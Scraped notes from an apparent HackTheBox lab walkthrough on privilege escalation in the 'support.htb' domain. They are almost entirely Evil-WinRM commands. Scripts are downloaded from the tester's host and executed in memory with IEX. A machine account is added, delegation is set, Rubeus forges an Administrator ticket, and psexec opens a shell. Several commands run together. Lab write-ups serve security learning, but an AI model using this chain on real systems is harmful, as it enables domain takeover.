Priv Esc
Outbound object rights
Generic all
Last updated
Last updated
*Evil-WinRM* PS C:\Users\support\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> curl 10.10.14.3/Rubeus.exe -o Rubeus.exe
*Evil-WinRM* PS C:\programdata> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Powermad.ps1')
*Evil-WinRM* PS C:\programdata> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/PowerView.ps1')Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota New-MachineAccount -MachineAccount Adot8Machine -Password $(ConvertTo-SecureString 'adot8' -AsPlainText -Force)$ComputerSid = Get-DomainComputer Adot8Machine -Properties objectsid | Select -Expand objectsid$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)Get-DomainComputer Adot8Machine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}.\Rubeus.exe hash /password:adot8.\Rubeus.exe s4u /user:Adot8Machine$ /rc4:872E7BD85E304E2AF28DFE1BDAF25D8B /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /pttbase64 -d ticket.kirbi.b64 > ticket.kirbiticketConverter.py ticket.kirbi ticket.ccacheexport KRB5CCNAME=ticket.ccacheimpacket-psexec -k -no-pass support.htb/[email protected]